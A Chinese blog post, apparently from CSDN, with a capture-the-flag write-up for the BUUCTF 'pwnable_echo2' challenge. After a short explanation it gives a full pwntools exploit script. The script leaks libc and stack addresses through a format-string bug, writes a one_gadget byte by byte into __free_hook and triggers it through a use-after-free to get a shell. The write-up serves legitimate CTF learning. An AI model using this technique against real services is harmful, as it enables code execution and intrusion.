(BUUCTF)pwnable_echo2

最新推荐文章于 2024-07-28 11:23:13 发布
最新推荐文章于 2024-07-28 11:23:13 发布
阅读量40 收藏
点赞数
分类专栏: pwn_writeup 文章标签: 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/135003231
版权

文章目录

前置知识

  • 格式化字符串
  • free_hook利用

整体思路

可以无限利用的格式化字符串漏洞,白给

只需要注意一点就是格式化字符串漏洞的地方payload长度有限,只能输入0x20长度的payload

这里偷懒了用了pwntools带的fmtstr_payload,因此多用了几次,其实可以自己写比较好

exp

from pwn import *
from LibcSearcher import *

filename = './echo2'
context(log_level='debug', arch='amd64')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 28603)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)


choice_words = 'Choice: '

def input_name(name):
    sh.sendlineafter("hey, what's your name? : ", str(name))


def fmt(content):
    sh.sendlineafter('> ', '2')
    sh.recvline()
    sh.sendline(content)

def uaf(content):
    sh.sendlineafter('> ', '3')
    sh.recvline()
    sh.send(content)

input_name('123')
payload = '%19$p%9$p'
fmt(payload)
libc_leak = int(sh.recv(14).decode(), 16)
leak_info('libc_leak', libc_leak)
stack_leak = int(sh.recv(14).decode(), 16)
leak_info('stack_leak', stack_leak)
return_addr = stack_leak - 0x38
libc.address = libc_leak - 0x20830
leak_info('libc.address', libc.address)
leak_info('return_address', return_addr)

one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
gadget = libc.address + one_gadget[1]
leak_info('gadget', gadget)
payload = fmtstr_payload(6, {(libc.sym['__free_hook']): (gadget) & 0xff}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 1): ((gadget) & 0xff00) >> 8}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 2): ((gadget) & 0xff0000) >> 16}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 3): ((gadget) & 0xff000000) >> 24}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 4): ((gadget) & 0xff00000000) >> 32}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 5): ((gadget) & 0xff0000000000) >> 40}, write_size='byte')
print(len(payload))
fmt(payload)

payload = fmtstr_payload(6, {(libc.sym['__free_hook'] + 6): ((gadget) & 0xff000000000000) >> 48}, write_size='byte')
print(len(payload))
fmt(payload)

uaf('123')

# debug()

sh.interactive()
# debug()
LtfallQwQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF-pwn]——pwnable_echo2
Y_peak的博客
11-16 898
[BUUCTF-pwn]——pwnable_echo2 附件 题解 没那么多时间写详细的题解,就简单理一下思路了。 首先这个题目中通过 2. : FSB echo 我们可以泄露出来栈上的地址,这里我们泄露出来的是当前栈帧rbp中存储的地址,也就是mian函数的rbp地址。通过rbp与变量的关系,我们可以得到我们在程序开始运行时写入name的地址。由于栈是可执行的,我们只需要将shellcode写入我们要写入的name的位置即可。不过长度要小于24。 做到这一步第一步就完成了,下面我们需要利用uaf漏洞来劫持
[BUUCTF-pwn]——inndy_echo
Y_peak的博客
03-29 523
[BUUCTF-pwn]——inndy_echo 有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。 从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。 先找找偏移 7 exploit from pwn import * p = remote("node3.buuoj.cn",28268) #p = process("./echo") #gdb.attach(p, "b printf
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1237
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 339
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
[BUUCTF]PWN——inndy_echo(32位fmt修改got表)
mcmuyanga的博客
02-01 846
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
pwnable(echo2)【64位格式化字符串&uaf】
九层台
01-26 705
echo1差不多都没开启任何保护,有一个格式化字符串漏洞 64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据) 64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9 这是执行printf时候的状态。 这个是输出的数据 0x1cd605f,0x7f81ace85790,0x70252...
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1501
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2867
BUUCTF picoctf_2018_echo back
pwnable(echo1)【栈溢出shellcode模板】
九层台
01-25 690
这个题目可以作为一个栈溢出使用shellcode的模板,它除了给出栈溢出,关闭了NX和canary保护其他的什么都没有给。 这里的溢出,看一下它的上一级 输入1会执行它。 我的想法是没有地址我就找rop来泄露libc,或者栈的地址 但是看了一下没有能用的rop 换个思路,导入shellcode,用jmp esp指令作为跳转(这个可以作为导入shellcode的一种通用思路)。 查了一下en...
BUUCTF【hitcontraining_magicheap】
weixin_51055545的博客
02-13 1673
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
uart_echo.rar_Echo Echo_amr
09-14
标题中的"uart_echo.rar_Echo Echo_amr"表明这是一个与UART(通用异步收发传输器)相关的项目,特别地,它是一个针对AMR(Adaptive Multi-Rate,一种音频编码标准)处理的示例,可能涉及到语音回声消除功能。...
uart_echo.rar_Echo Echo
09-23
2. **中断驱动**:为了实现Echo功能,你可以使用中断驱动的方式。当UART检测到数据接收完成时,会产生一个中断请求,然后在中断服务程序中读取并回发数据。 3. **轮询方式**:另一种实现方法是轮询,即定期检查UART...
tcp_echo.rar_tcp_echo
09-19
2. **Unix系统编程** 这个程序是在Unix环境下编写的,Unix系统提供了一系列的系统调用接口,如socket、bind、listen、accept、read、write等,用于进行网络通信。通过这些API,开发者可以构建各种复杂的网络应用。 ...
uart_echo.zip_Echo Echo_echo测试串口_uartecho
09-20
2. **发送数据**:通过编程控制LM4FLaunchpad的UART接口发送一系列已知的数据包。 3. **接收数据**:在同一设备的UART接收端,读取接收到的数据,并与发送的数据进行比较。 4. **数据比较**:如果接收到的数据与...
aes.rar_Echo Echo_acoustic echo
09-24
标题中的"aes.rar_Echo Echo_acoustic echo"表明这是一个与AES(Acoustic Echo Cancellation)技术相关的压缩包,其中可能包含了一些关于消除回声的音频处理资料。"Echo Echo_acoustic echo"这部分可能是对主题的...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1056
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1094
大语言模型提示注入攻击安全风险分析报告下载
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 843
大语言模型(LLM)安全测评基准V1.0 发布版下载
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8354
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
实验室责任人员管理保障实训系统安全
最新发布
07-28 298
​ 在智慧校园的实训管理生态中,实验室责任人员的角色犹如精密机器中的关键齿轮,他们不仅是实验室安全与高效运转的守护者,更是实训教学质量的直接塑造者。这一角色的重要性,在智慧校园的数字化转型中得到了前所未有的凸显,通过一系列精心设计的功能模块,实验室责任人员得以在更加智能化、系统化的环境中履行其职责,确保每一场实训都能在安全、有序且富有成效的环境下进行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值